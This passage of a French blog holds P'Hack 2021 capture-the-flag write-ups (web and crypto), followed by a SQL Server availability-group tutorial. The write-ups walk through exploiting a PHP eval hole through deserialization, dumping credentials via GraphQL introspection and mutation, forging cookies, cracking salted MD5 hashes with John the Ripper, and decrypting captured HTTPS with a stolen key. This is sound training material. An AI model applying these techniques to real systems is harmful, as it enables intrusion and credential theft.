  $quantities = [1, 5, 10, 25, 50, 100, "PHACK{}"];

  if (isset($this -> type) && isset($this -> quantity)) {
    if(in_array($this -> type, $types) && in_array($this -> quantity, $quantities)) {
        prepareOrder($this);
        return "Votre commande de " . $this -> quantity . " chocholats ("  . $this -> type .  ") est en préparation.";
    }
    else {
      if ($DEBUG) {
        //Affichage des variables pour deboguer. Enfin..Je crois que c'est ça que ca fait.
        eval($this -> type . ' ' . $this -> quantity);
      }

      return "Il semble y avoir un problème avec votre commande. Merde de contacter quelqu'un d'autre.";
    }
  }
}

On voit ici que $this->type et $this->quantity doivent exister et qu'on a intérêt à ne pas leur donner une valeur présent dans les deux array juste au dessus afin, on l'espère, de trigger la fonction eval qui va nous permettre d'exécuter du code arbitraire passé dans les deux champs de la classe. Le moyen le plus simple pour obtenir le payload à passer à la fonction unserialize reste d'appeler la méthode serialize dans un interpréteur PHP (n'importe lequel en ligne fera l'affaire). Ici on va utiliser le code suivant :

L'avantage de cette méthode est qu'on pourra passer le code que l'on souhaite vraiment évaluer dans le paramètre POST code sans avoir besoin de changer le payload de sérialization à chaque fois. On teste notre système en mettant un simple echo 'hello'; dans notre paramètre et on récupère bien le retour dans le page HTML.
À partir de là, on va utiliser cette faille pour lire le contenu actuel de la page index.php. On va simplement envoyer le code suivant :
echo file_get_contents('index.php');

Le code de la page est exactement le même que celui qu'on a pu récupérer dans l'archive à une exception près, la ligne d'include en haut de fichier :
include("config-126546845171616835186.php");

Essayons de lire ce fichier en changeant juste le nom de fichier dans notre code précédent. Et nous obtenons le flag qui était dans le fichier de config.
PHACK{l3s_cl0Ch3s_s0nT_p4s5ees_!}

Un challenge qui était plutôt simple une fois passé l'étape de base qui était de découvrir cette archive de backup mais qui nous aura bien pris la tête, il faut bien le dire !
Agenda - 256pts
Votre ami est tout fier d'avoir créé son propre agenda de conférences en ligne.
Il vous demande de vérifier la sécurité avant de le mettre en production.

Lien du challenge : agenda.phack.fr
On lance le site web et on récupère une page avec une liste de conférence.
La première chose qu'on voit c'est que la page se charge dans un premier temps puis seulement après la liste des conférences s'affiche. On dirait que la liste est chargée via javascript avec un appel API où quelque chose du genre. On recharge donc la page avec l'onglet network de l'inspecteur ouvert et on observe un appel à un endpoint http://agenda-backend.phack.fr/graphql. Il faut sûrement qu'on exploite ce endpoint. Pour le chargement des conférences, il lui est envoyé le payload suivant : 
{
   "query":"
     query {
       conferences {
         id, 
         name, 
         city, 
         talks {
           id, 
           title, 
           summary, 
           speakers {
             id, 
             name, 
             githubAccount, 
             blog
           }
         }
       }
     }"
}

On va tenter une bête requête d'introspection pour voir le résultat que ça peut nous retourner.
query {__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}

Et comme espérer, on nous envoie le détail complet de la "base" graphql avec le type d'objet disponible ainsi que les query que l'on peut faire dessus. Le fichier json résultant est disponible ici https://blog.julienmialon.com/uploads/ctf/phack/agenda1.json
On voit qu'il y a une query nommée "persons" qui est disponible ainsi que les champs du type Person qui contiennent login et passw0rd. Voyons si on peut query la liste des personnes et récupérer leurs identifiant de cette manière. On envoi la query suivante : 
query { persons { id, name, login, passw0rd }}

Et on récupère la liste de tous les utilisateurs, avec le dernier qui dispose d'un login et mot de passe.
{
    "id": "16",
    "name": "Admin",
    "login": "flagman",
    "passw0rd": "s3cr3t_d0_n07_Sh4r3"
}

On se connecte avec cet identifiant sur le site et on récupère le flag
PHACK{1_l0v3_gR4pHQl_1ntR0sp3ct10n}

Agenda 2 - 256pts
Maintenant c'est bon, le problème de sécurité a été corrigé.
Vérifiez de nouveau, on ne sait jamais.

Lien du challenge : agenda2.phack.fr
On ouvre ici un site web qui semble être le même que le challenge précédent mais qui aurait été patché pour ne pas rendre visible le mot de passe aussi facilement en tout cas. On relance notre requête d'introspection avec le résultat disponible ici https://blog.julienmialon.com/uploads/ctf/phack/agenda2.json. Un diff avec le fichier précédent nous indique qu'une partie mutation a été ajouté mais que le reste est strictement identique.
On retente notre requête pour lister les utilisateurs au cas où, pas de chance, l'utilisateur que l'on a utilisé sur le challenge précédent et qui était le seul à avoir un mot de passe renseigné à semble t'il était supprimé.
Puisque la partie mutation a été ajouté, on va plutôt se pencher de ce côté là pour voir si on ne pourrait pas ajouter un utilisateur à la base pour se connecter.
{
    "name": "addPerson",
    "args": [
        {
            "name": "person",
            "description": "",
            "type": {
                "name": null,
                "kind": "NON_NULL",
                "ofType": {
                    "name": "InputPerson",
                    "kind": "INPUT_OBJECT"
                }
            }
        }
    ]
}

On trouve le détail de la mutation qui va nous intéresser pour ajouter un utilisateur et on créé la requête suivante pour l'ajouter à la base.
mutation {
  addPerson(person: { 
    name: "hello", 
    login: "hello", 
    passw0rd: "world"
  }) { 
    id 
  } 
}

Si on reconsulte notre liste d'utilisateurs, on voit que notre nouvel utilisateur a bien été ajouté. On l'utilise donc pour se logger sur le site et récupérer le flag : 
PHACK{th3_bUg_H4s_mut4t3d}

The Faceboox - 512pts
Un jeune étudiant prétentieux d'Harvard se vante d'avoir lancé TheFaceboox, un réseau social qui sera bientôt plus populaire que mySpoox, votre site de coeur.
Prouvez au monde entier que son site ne vaut pas un clou en prenant le contrôle de son compte !

Lien du challenge : the-faceboox.phack.fr
On se retrouve ici sur un site web qui n'est pas sans rappeler un réseau social bien connu, à première vue on a une page de login qui semble être fonctionnelle, une partie inscription et réinitialisation de mot de passe non implémentée et plusieurs pages d'information divers et variées.
Page intéressante tout de même, une page de login spécifique pour la presse et les annonceurs publicitaires : http://the-faceboox.phack.fr/media.html
Et dans le code source de la page index.html, on trouve


On parvient à se logger sur la page pour la presse en tant que demo/demo. Malheureusement, on arrive sur une page en cours de construction, rien de disponible ici.
On a tout de même deux cookies déposé lors de notre connexion avec le compte demo. Le premier PHPSESSID qui correspond à une session PHP, classique pour un site web. Le second par contre paraît plus intéresant.
session : eyJpZCI6MSwidHlwZSI6InByZXNzIn0=

On retrouve la séquence de début eyJ, c'est très certainement du json en base64. Une fois décodé on obtient le json ci-dessous.
{"id":1,"type":"press"}

Maintenant il va s'agir de tester plusieurs choses. Dans un premier temps, on tente de changer l'id en 2 pour voir si on pourrait se connecter à un autre compte. On change la valeur du cookie avec notre nouveau json encodé en base64 et on recharge la page. Apparaît une simple erreur :
ERROR: Provided cookie id (2) must match session id (1)

On en conclus que la session PHP doit aussi contenir l'id et vérifier la cohérence entre les deux. Deuxième possibilité, envoyer un autre type de compte. On envoie un type de compte "admin" (sur un malentendu on sait jamais ça pourrait passer ^^). On reçoit une erreur mais qui nous aide cette fois-ci :
ERROR: Session type must be one of : student, press

Aucun problème, on change notre type de compte en "student" et on reçoit une erreur nous indiquant que les compte de type étudiant ne sont pas autorisé à accéder à la page press.php mais qu'ils peuvent accéder à profile.php. Aucun problème, on va sur la page profile et on accède au profil de l'étudiant avec l'id 1.
Seul les pages My Profile et My Messages sont réellement implémenté, la page de message nous permet de découvrir qu'on peut consulter les profils d'autres personnes via la page /user.php?id=2. Un test rapide nous montre qu'on peut énumérer les id 1 (nous) à 5 (zuckerberg). Un paramètre de cette manière dans une URL, on lance sqlmap pour vérifier si jamais il serait sensible à une injection SQL mais le résultat est négatif. On tente de rentrer quelque chose dans le champ de recherche au cas où celui ci le serait et on reçoit une erreur :
This server is running an unsupported MySQL version (Error while connecting to MySQL: Connector::DBI::Mysql connect(...) failed: Can't connect to local MySQL server using file '/var/www/html/old_Test_Database.sql' (2) at /usr/local/mysql/MysqlUtils/Connector.pm line 136. Ask your system administrator to upgrade MySQL to improve security and features.

Au départ, ça ressemble à une erreur MySQL 'classique' mais a y bien regarder on vois la mention à un fichier SQL /var/www/html/old_Test_Database.sql.
On accède à ce fichier via l'url http://the-faceboox.phack.fr/old_Test_Database.sql et on récupère un fichier SQL qui ressemble au requêtes qui auraient pu être utilisé pour créer et initialiser la base de données. Voici la portion du fichier qui va nous intéresser : 
DROP TABLE IF EXISTS `press`;
CREATE TABLE `press` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `user` text,
  `passwd` text,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
INSERT INTO `press` VALUES (1,'demo',''),(2,'cnn',''),(3,'nyt',''),(4,'guardian',''),(5,'fox','');

DROP TABLE IF EXISTS `students`;
CREATE TABLE `students` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `mail` text,
  `passwd` text,
  `postfix_hash_salt` text,
  `first_name` text,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
INSERT INTO `students` VALUES 
(1,'mike.spen@harvard.edu','a1a93242bea0cd80285ccfaf69ff96b1','7heF@c3b00x','Mike'),
(2,'laura00@aol.com','cb24a277e4b0c98e2d5eefbc17b2e658','7heF@c3b00x','Laura'),
(3,'kev.rgn@caramail.com','a066fcee06d941af7c0dfbdd05c4cda3','7heF@c3b00x','Kevin'),
(4,'rachel.west@fox-news.com','a8a2ddbeeff303b0694e480c32c8ae6c','7heF@c3b00x','Rachel');

On a donc la liste des comptes presses qui ont été ajouté dans la base de données mais sans leurs mots de passes. Et la liste des utilisateurs (excepté le 5) avec leurs email, le mot de passe qui semble hashé en MD5 et un champ postfix_hash_salt qui serait bien un salt ajouté au mot de passe avant d'être hashé. On va donc essayer de cracker les mots de passes des 4 utilisateurs que l'on a ici avec John The Ripper.

Puisqu'il y a eu un salt d'utilisé ici, on va créer notre fichier d'input avec les infos de ce salt sous le format user:hash$salt:
mike:a1a93242bea0cd80285ccfaf69ff96b1$7heF@c3b00x
laura:cb24a277e4b0c98e2d5eefbc17b2e658$7heF@c3b00x
kev:a066fcee06d941af7c0dfbdd05c4cda3$7heF@c3b00x
rachel:a8a2ddbeeff303b0694e480c32c8ae6c$7heF@c3b00x

On a tronqué les noms d'utilisateur pour ne pas s'embêter. On liste ensuite les subformats supporté par Jogn The Ripper pour trouver lequel est le mieux adapté à notre problème :
$ john --list=subformats | grep md5
Format = dynamic_0   type = dynamic_0: md5($p) (raw-md5)
Format = dynamic_1   type = dynamic_1: md5($p.$s) (joomla)
Format = dynamic_2   type = dynamic_2: md5(md5($p)) (e107)
Format = dynamic_3   type = dynamic_3: md5(md5(md5($p)))
Format = dynamic_4   type = dynamic_4: md5($s.$p) (OSC)
...

Dans les premiers on voit que le dynamic_1 pourrait correspondre, il hash avec la fonction md5(password . salt) ce qui est exactement ce que l'on souhaite. On lance donc la commande pour cracker nos mots de passes en se servant de la liste rockyou.
$ john user.txt -form=dynamic_1 --wordlist=rockyou.txt

En quelques secondes les mots de passes sont crackés et on peut les afficher avec la commande suivante
$ john --show --format=dynamic_1 user.txt
mike:Mike94
laura:XxlauraxX
kev:NarutoUzumaki
rachel:fox12345

À partir de là, on se connecte sur le site avec les emails et mots de passes que l'on a récupéré, les 3 premiers ne sont pas spécialement intéressant, seulement quelques messages échangés entre eux. Ontrouve par contre sur le compte de Rachel ce message provenant de Mark Zuckerberg en personne :
En allant vérifier le script SQL d'initialisation de la base de données qu'on avait récupérer, on se rend compte que le compte presse de Fox News à l'id 5 (qui est l'id du dernier utilisateur auquel nous n'avons pas accès). On se connecte donc avec le compte fox et le mot de passe fourni dans le message avant de changer le type de compte dans le cookie en student comme précédemment et de récupérer le flag dans les messages personnels de Mark Zuckerberg.
PHACK{1Nt3rnet_C'e7ait_m1euX_Av@nt!:(}

Liens utiles 
Pleins d'informations sur comment utiliser John The Ripper
Cracking Password John The Ripper | VK9 Security
John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak passwords. Read more…
VK9 SecurityPublished by Vry4n_ on 1st April 20201st April 2020
Exegol, un container docker contenant plein d'outil pre packagé
ShutdownRepo/Exegol
Exegol is a fully featured and community-driven hacking environment - ShutdownRepo/Exegol
GitHubShutdownRepo



P'Hack - Cryptography
Julien Mialon — Sun, 11 Apr 2021 16:00:23 GMT
4 challenges dans cette catégorie, du très simple à un peu plus compliqué.
Guacamole - 128pts
Un bon avocat vous serait sûrement d'une aide précieuse..
M'ocd lbkfy ! Ox rywwkqo ke wosvvoeb kfymkd no xydbo qoxobkdsyx, vo pvkq ocd wkbCrkvvObsUCox. T'oczobo aeo vo toe no wyd fyec kebk zve ("K fked U")!
Le flag est à rendre au format `PHACK{...}`.
Un petit challenge assez simple pour démarrer, le contenu ressemble à un décalage de caractères du genre du chiffre de César, il nous faut juste trouver le décalage en question. Un site assez pratique pour cela : https://rot13.com, contrairement à son nom, il permet d'énumérer facilement les décalage de 1 à 25. On trouve donc que le décalage était de 16 et on récupère le message ci-dessous.
C'est bravo ! En hommage au meilleur avocat de notre generation, le flag est marShallEriKSen. J'espere que le jeu de mot vous aura plu ("A vaut K")!
Le flag est donc PHACK{marShallEriKSen}
Enchaîné - 128pts
Lors de votre phase de reconnaissance, vous avez trouvé une chaîne de caractères étrange : 

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQSGFja0NURiIsI
mlhdCI6MTYxNzM4NjQwMCwiZXhwIjoxNjE4MTY0MDAwLCJhdWQiOiIi
LCJzdWIiOiIiLCJmbGFnIjoiNTEzMTU2NGY1NTQ2NjgzNzVhMzM1NTc4N
WE2YzM4Nzc1OTU0NGU2NjYxNmE1MjZkNTgzMTU2MzI1NTU2NDU3YT
U5NTgzMDNkIn0.XsPHPbpV2oHwi8t1dPXblJ2IokuUNhJywOyqKdFB9cw

Il vous semble connaître ce format, mais sans certitude.
Pour le coup, c'est un format assez connu, on est clairement sur du json encodé en base64 (les trois premiers caractères eyJ en sont caractéristique). On voit 2 points dans le contenu, marqueurs caractéristiques d'un JWT. Le site https://jwt.io permet de décoder ce genre de token. On trouve le contenu : 
{
  "iss": "PHackCTF",
  "iat": 1617386400,
  "exp": 1618164000,
  "aud": "",
  "sub": "",
  "flag": "5131564f554668375a3355785a6c387759544e66616a526d583156325556457a5958303d"
}

La propriété nommé flag nous intéresse pas mal, ça ressemble à de l'hexadécimal. On utilise le site https://www.rapidtables.com/convert/number/hex-to-ascii.html pour convertir l'hexadécimal en ASCII pour obtenir
Q1VOUFh7Z3UxZl8wYTNfajRmX1V2UVEzYX0=
On dirait encore du base64... Un petit tour sur https://www.base64decode.org nous permet de le décoder et d'obtenir quelque chose qui se rapproche d'un flag 
CUNPX{gu1f_0a3_j4f_UvQQ3a}
On sait que le format des flags est PHACK{}, dans le doute, on va retourner sur le site https://rot13.com pour essayer le décalage de lettre. Et il s'agit finalement d'un ROT13 pour obtenir le flag final.
PHACK{th1s_0n3_w4s_HiDD3n}
Un challenge qui porte bien son nom du coup, plusieurs méthode enchaîné pour récupérer ce flag.
H3lp - 256pts
Un message de votre ami intergalactique vient d'arriver !
Saurez-vous le décoder à temps ?
3()()¯¯V)--, '-- v^|--[]_|\|/ <(Z/\>-'v^ []_|¯¯U L!LL|_]_]^-]=[[]ZLL| |--() 3<[^-[]] .. '-- LLVVUU_] _|'--_V_\|/ -^() ^-WUU/\ 3<(v^ _V_'--¯¯VZ<{A_^-LL|¯¯V. E>- '--Z>LL|[/][--'--LD<||--'--()Zv^ <[A< <{^UU (/)UUWZ V\[]E\|/[--]=['--ZLD.
¯¯U()Z'|-- 3()^- U()3-^())-- .. 3VV ]=[<(>\|/ <( L|_A<'--UUZ¯¯U '--Z ZUUVV¯¯U, <{Z¯¯V 3W 3'--_|_| Z()[-- ^

Le flag est le lieu de rendez-vous en majuscules au format `PHACK{LIEU}`.
Ce challenge pour le coup nous a pris un peu plus la tête, le titre du challenge 'H3lp' nous donne plutôt un indice sur du leet speak ou quelque chose associé. En regardant le contenu du texte on voit bien des séquences de caractères qui se répètent. Les différents niveaux de leet speak ne contiennent pas une grande partie des caractères que l'on a ici, il semble donc qu'on a à faire à une version différentes. On fini par trouver le LSPK90 CW, le leet speak à 90°, ça devient beaucoup plus simple à lire d'un coup. Pour notre plus grand bonheur, il existe même un site web https://www.dcode.fr/lspk90-cw-leet-speak-90-degrees-clockwise qui permet de le décoder. On récupère donc le message : 
WOODY, I STOLE ANDY'S OLD CELLPHONE TO WARN YOU : 
I FEEL LIKE BO PEED WAS KIDNAPPED. 
MY INVESTIGATIONS ARE LEADING ME TO THE INFAMOUS ZURG.
MR POTATO AND REX ARE HELPING ME ON THIS. 
MEET ME TONIGHT, 7P.M, AT PIZZAPLANET. 
I HEARD THAT ONE OF THE LITTLE GREEN MEN MIGHT HAVE SEEN SOMETHING.
DON'T WORRY COWBOY : WE HAVE A FRIEND IN NEED, 
AND WE WILL NOT REST UNTIL HE'S SAFE IN ANDY'S ROOM.
TAKE CARE.
BUZZ

Et donc le flag est PHACK{PIZZAPLANET}
Certifié sécurisé - 256pts
Une de vos connaissance sur le darknet vous informe avoir réussi à s'infiltrer sur l'ordinateur de l'un des admins du CTF.
Après avoir capturé un peu de trafic réseau et récupéré quelques fichiers, la connexion a été coupée subitement.

Il semblerait qu'il était en train de travailler sur l'un des challenges du CTF.
Voyez si vous arrivez à récupérer un mot de passe !

Format du flag : PHACK{mot_de_passe}
Ici on a un fichier zip joint 'stolen_data.zip', il ne reste plus qu'à voir ce qu'on peut faire avec. on trouve le chemin /home/admin et plusieurs fichiers dans le home de l'admin.
Après étude rapide de tous les fichiers, les 3 qui semblent nous intéresser sont les 3 premiers. D'abord le .bash_history va nous en apprendre un peu plus sur ce qui s'est passé sur cette machine : 
La première ligne paraît bien trop évidente mais on a testé, ce n'est bien entendu pas le flag. Par rapport au nom du challenge, le fait qu'il y ai des certificats nous paraît intéressant. Mais comment les récupérer ? Le docker-build-push.sh peut nous faire penser qu'une image docker a été créé et qu'on va peut être pouvoir la récupérer. Et effectivement dans le docker-compose.yml, on trouve une image qui à l'air intéressante : 
Un petit tour sur le docker hub et on trouve cette image : https://hub.docker.com/r/phackctf/challenge 
On va run cette image et lancer un bash dedans pour voir ce qu'il s'y passe avec la commande docker run -it phackctf/challenge /bin/bash. On explore le contenu de l'image et on y trouve deux dossier intéressant : /chall et /cert
Le fichier index.php semble être ce qu'on cherche, puisqu'il contient la forme hashée de ce qu'on suppose être le mot de passe pour le flag.
Bien évidemment passer le hash dans https://crackstation.net n'a rien donné (ça aurait été trop simple :D). 
Le dossier /cert contient le certificat et la clé privée RSA qui, on suppose, va avec pour servir la page php en https. À ce niveau là, il est intéressant d'aller voir le fichier capture.pcapng qui était présent dans le fichier zip. On l'ouvre avec wireshark et on récupère les trames réseaux qui ont été échangées. Comme imaginé, on y trouve les échanges avec la page index.php. Problème, c'est du https, il est donc nécessaire de charger la clé privée RSA pour pouvoir le décoder. Un petit tour dans le menu préférences -> RSA Keys de wireshark, on ajoute notre clé (récupérée depuis l'image docker) et là tout devient plus clair.
On a récupérer le mot de passe associé au compte admin pour la page présente dans le container docker. On le submit sous la forme PHACK{Th1sIsH3llOfAP4ssw0rd!} et le challenge est validé.



SQLServer : High availability group
Julien Mialon — Mon, 29 Mar 2021 17:31:19 GMT
Mettre en place une replication sur au moins 3 noeuds avec un serveur SQL. Après avoir tenté pendant un moment avec mysql que je n'ai jamais réussi à faire fonctionner dans un conteneur docker, je me suis intéressé à SQLServer de Microsoft.
Un peu moins facile d'utilisation que la version MySQL en terme de développement par la suite, il a l'avantage de proposer ce dont j'avais besoin pour mes tests, c'est à dire de la réplication de données sur au moins 3 noeuds avec la possibilité de failover et tout ça dans du docker :-)
Première étape : configurer le container docker
Par défault le container docker de SQLServer n'a pas les options de haute disponibilité activée. En soi, ce n'est pas un problème, il nous suffit de faire notre propre image docker à partir de l'original pour l'activer. Voici donc le Dockerfile: 
FROM mcr.microsoft.com/mssql/server:2019-latest

USER root
RUN /opt/mssql/bin/mssql-conf set hadr.hadrenabled  1
RUN /opt/mssql/bin/mssql-conf set sqlagent.enabled true

USER mssql

Seule subtilité ici si vous êtes habitué à docker c'est le changement en user root avant de lancer les options pour ensuite reswitcher sur l'utilisateur normal du container, à savoir, mssql. On le build, chez moi l'image sera nommée `sqlserver-ha`
Deuxième étape : déploiement de 3 noeuds
Première chose, créé les dossiers de données dont on va avoir besoin et donner les droit aux user mssql qui va en avoir besoin : 
mkdir data1 data2 data3 shared1 shared2 shared3
sudo chown 10001 data1 data2 data3 shared1 shared2 shared3

On déploie ensuite avec le docker compose suivant
version: '3.6'

services:
  sqlserver1:
    container_name: sqlserver1
    image: sqlserver-ha:latest
    environment:
      SA_PASSWORD: "PB6P88z6b44QCdkt"
      ACCEPT_EULA: "Y"
    volumes:
      - ./data1:/var/opt/mssql/data
      - ./shared1:/var/shared_data
    ports:
      - "14331:1433"
      - "50221:5022"
    hostname: "sqlserver1"
  
  sqlserver2:
    container_name: sqlserver2
    image: sqlserver-ha:latest
    environment:
      SA_PASSWORD: "PB6P88z6b44QCdkt"
      ACCEPT_EULA: "Y"
    volumes:
      - ./data2:/var/opt/mssql/data
      - ./shared2:/var/shared_data
    ports:
      - "14332:1433"
      - "50222:5022"
    hostname: "sqlserver2"

  sqlserver3:
    container_name: sqlserver3
    image: sqlserver-ha:latest
    environment:
      SA_PASSWORD: "PB6P88z6b44QCdkt"
      ACCEPT_EULA: "Y"
    volumes:
      - ./data3:/var/opt/mssql/data
      - ./shared3:/var/shared_data
    ports:
      - "14333:1433"
      - "50223:5022"
    hostname: "sqlserver3"


On notera le fait de rediriger le port 1433 (port standard pour la connexion à la base SQLServer) mais aussi le port 5022 qui servira à communiquer entre nos noeuds. Bien évidemment si vous êtes sur une seule machine avec vos 3 noeuds, vous n'avez pas forcément besoin de rediriger le port 5022. Mais ici on a lancé nos 3 noeuds sur 3 serveurs différents.
On lance le `docker-compose up -d`, on vérifie dans les logs que les serveurs ce sont bien initialisé et on peut passer à la suite, la configuration du groupe de disponibilité.
Troisième étape : configurer le groupe HA
On définit que notre noeud sqlserver1 va être le noeud primaire de notre groupe, on va donc commencer par le configurer en exécutant ces quelques lignes SQL.
USE master
GO
-- Create user for replication
CREATE LOGIN dbm_login WITH PASSWORD = 'KuDzgdXGR7dD79Uv';
CREATE USER dbm_user FOR LOGIN dbm_login;
GO
-- Create encryption key to share with other nodes
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'KuDzgdXGR7dD79Uv';
go
CREATE CERTIFICATE dbm_certificate WITH SUBJECT = 'dbm';
BACKUP CERTIFICATE dbm_certificate
TO FILE = '/var/shared_data/dbm_certificate.cer'
WITH PRIVATE KEY (
        FILE = '/var/shared_data/dbm_certificate.pvk',
        ENCRYPTION BY PASSWORD = 'KuDzgdXGR7dD79Uv'
    );
GO
-- Create replication endpoint to communicate with others
CREATE ENDPOINT [Hadr_endpoint]
    AS TCP (LISTENER_IP = (0.0.0.0), LISTENER_PORT = 5022)
    FOR DATA_MIRRORING (
        ROLE = ALL,
        AUTHENTICATION = CERTIFICATE dbm_certificate,
        ENCRYPTION = REQUIRED ALGORITHM AES
        );
ALTER ENDPOINT [Hadr_endpoint] STATE = STARTED;
GRANT CONNECT ON ENDPOINT::[Hadr_endpoint] TO [dbm_login];
GO

ALTER EVENT SESSION  AlwaysOn_health ON SERVER WITH (STARTUP_STATE=ON);
GO

Lors de la configuration, le noeud primaire a exporté un certificat dans le dossier shared1, il vous faut maintenant copier le certificat (les deux fichiers) dans les dossiers shared2 et shared3 pour pouvoir ensuite les importer dans les noeuds correspondant avec le script SQL suivant (à exécuter sur node2 et node3) : 
USE master
GO
-- create user for replication
CREATE LOGIN dbm_login WITH PASSWORD = 'KuDzgdXGR7dD79Uv';
CREATE USER dbm_user FOR LOGIN dbm_login;
GO
-- import certificate from primary node
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'KuDzgdXGR7dD79Uv';
go
CREATE CERTIFICATE dbm_certificate
    AUTHORIZATION dbm_user
    FROM FILE = '/var/shared_data/dbm_certificate.cer'
    WITH PRIVATE KEY (
    FILE = '/var/shared_data/dbm_certificate.pvk',
    DECRYPTION BY PASSWORD = 'KuDzgdXGR7dD79Uv'
);
GO
-- create endpoint for replication
CREATE ENDPOINT [Hadr_endpoint]
    AS TCP (LISTENER_IP = (0.0.0.0), LISTENER_PORT = 5022)
    FOR DATA_MIRRORING (
        ROLE = ALL,
        AUTHENTICATION = CERTIFICATE dbm_certificate,
        ENCRYPTION = REQUIRED ALGORITHM AES
        );
ALTER ENDPOINT [Hadr_endpoint] STATE = STARTED;
GRANT CONNECT ON ENDPOINT::[Hadr_endpoint] TO [dbm_login];
GO

ALTER EVENT SESSION  AlwaysOn_health ON SERVER WITH (STARTUP_STATE=ON);
GO

Une fois que tous nos serveurs sont configuré, il ne nous reste plus qu'à créer le groupe via cette commande SQL, a exécuter uniquement sur le noeud primaire
CREATE AVAILABILITY GROUP [AG1]
        WITH (CLUSTER_TYPE = NONE)
        FOR REPLICA ON
        N'sqlserver1' WITH (
            ENDPOINT_URL = N'tcp://sql1.moi.com:50221',
            AVAILABILITY_MODE = SYNCHRONOUS_COMMIT,
            SEEDING_MODE = AUTOMATIC,
            FAILOVER_MODE = MANUAL ,
            SECONDARY_ROLE (ALLOW_CONNECTIONS = ALL)
        ),
        N'sqlserver2' WITH (
            ENDPOINT_URL = N'tcp://sql2.moi.com:50222',
            AVAILABILITY_MODE = SYNCHRONOUS_COMMIT,
            SEEDING_MODE = AUTOMATIC,
            FAILOVER_MODE = MANUAL ,
            SECONDARY_ROLE (ALLOW_CONNECTIONS = ALL)
        ),
        N'sqlserver3' WITH (
            ENDPOINT_URL = N'tcp://sql3.moi.com:50223',
            AVAILABILITY_MODE = SYNCHRONOUS_COMMIT,
            SEEDING_MODE = AUTOMATIC,
            FAILOVER_MODE = MANUAL ,
            SECONDARY_ROLE (ALLOW_CONNECTIONS = ALL)
        );
GO

Vous prendrez bien évidemment soin de remplacer les ENDPOINT_URL avec l'adresse de vos serveurs.
Il ne nous reste plus qu'à indiquer à nos deux autres noeuds de rejoindre le groupe avec les commandes suivantes : 
ALTER AVAILABILITY GROUP [AG1] JOIN WITH (CLUSTER_TYPE = NONE);
ALTER AVAILABILITY GROUP [AG1] GRANT CREATE ANY DATABASE;
GO

Quatrième étape : créer la base de données
Étape finale, créer la base de données et indiquer quelle doit être répliquée. À partir de maintenant, les deux noeuds secondaires sont en lecture seule et vous ne pouvez écrire que sur le noeud primaire. On exécute donc la création de la base sur le noeud primaire
CREATE DATABASE agtestdb;
GO
-- backup de la base
ALTER DATABASE agtestdb SET RECOVERY FULL;
GO
BACKUP DATABASE agtestdb TO DISK = '/var/opt/mssql/data/agtestdb.bak';
GO
-- ajout de la base au groupe
ALTER AVAILABILITY GROUP [ag1] ADD DATABASE [agtestdb];
GO

Après quelques millisecondes, vous pouvez voir sur le dashboard de votre AG sur SSMS que la base est répliquée correctement sur les 3 instances 
Étape bonus : failover
La grande question, que faire quand votre noeud primaire tombe et que vous voulez promouvoir l'un des deux autres le temps que le premier soir réparé ou que vous souhaitez simplement mettre à jour une machine et donc l'éteindre pendant quelques minutes.
Si vous avez toujours l'accès au noeud primaire, afin de l'éteindre "proprement", il est nécessaire d'exécuter la commande suivante dessus : 
ALTER AVAILABILITY GROUP [ag1] OFFLINE

Une fois cette commande passée, vous pouvez vérifier sur votre dashboard, votre noeud primaire est indisponible. 
Dans tous les cas, on veut maintenant promouvoir un autre noeud en tant que noeud primaire. On va dans ce cas exécuter la commande suivante sur le noeud2 :
-- on passe en noeud primaire
ALTER AVAILABILITY GROUP ag1 FORCE_FAILOVER_ALLOW_DATA_LOSS;
-- on réactive la synchronisation de la base
alter database agtestdb set hadr resume

Le dashboard vous indique maintenant que votre noeud2 est le noeud primaire de votre groupe. Mais votre noeud3 ne s'est pas reconnecté. On va indiquer au noeud3 de se reconnecter au groupe.
ALTER AVAILABILITY GROUP [ag1] offline
ALTER AVAILABILITY GROUP [ag1] SET (Role = secondary);
alter database agtestdb set hadr resume

Et voilà, notre noeud3 est de retour dans notre groupe. Quand le noeud1 sera de nouveau disponible, il nous suffira d'exécuter les commandes suivantes pour qu'il fasse de même.
ALTER AVAILABILITY GROUP [ag1] SET (Role = secondary);
alter database agtestdb set hadr resume

Et si on souhaite remettre le noeud1 en noeud primaire, il suffira de refaire la procédure que l'on vient de voir.
Problèmes que l'on peut rencontrer
Si la création du groupe échoue avec une erreur indiquant qu'il n'y a pas le noeud courant dans le groupe, c'est que vous n'avez pas indiqué le hostname correctement dans le fichier docker-compose ou que le hostname que vous avez choisi fait plus de 15 caractères. Pour vérifier le hostname du serveur : 
Depuis un terminal pour vérifier celui du container docker
docker exec -it sqlserver1 /bin/hostname

Sur le serveur SQL pour vérifier celui qu'il a chargé
select @@servername

Ajouter un noeud
Sur le nouveau noeud, on va créer le certificat et le endpoint de la même manière qu'on l'avait fait pour les noeuds initiaux.
On va ensuite faire une sauvegarde de la base de données du noeud primaire et l'importer sur notre nouveau noeud
Sur le noeud primaire
backup database agtest to disk = '/var/shared_data/agtest.bak' with format
backup log agtest TO DISK = '/var/shared_data/agtest.bak.log'

On copie les deux fichiers ainsi récupéré sur notre nouveau noeud avant d'y exécuter les commandes suivantes :
restore database agtest from disk = '/var/shared_data/agtest.bak' with norecovery
restore log agtest from disk = '/var/shared_data/agtest.bak.log' with FILE=1, norecovery  

À partir du noeud primaire, on ajoute le noeud au groupe.
alter availability group AG1
	add replica on 'sqlserver4' with (
			ENDPOINT_URL = N'tcp://sql4.moi.com:50224',
            AVAILABILITY_MODE = SYNCHRONOUS_COMMIT,
            SEEDING_MODE = AUTOMATIC,
            FAILOVER_MODE = MANUAL ,
            SECONDARY_ROLE (ALLOW_CONNECTIONS = ALL)
        )

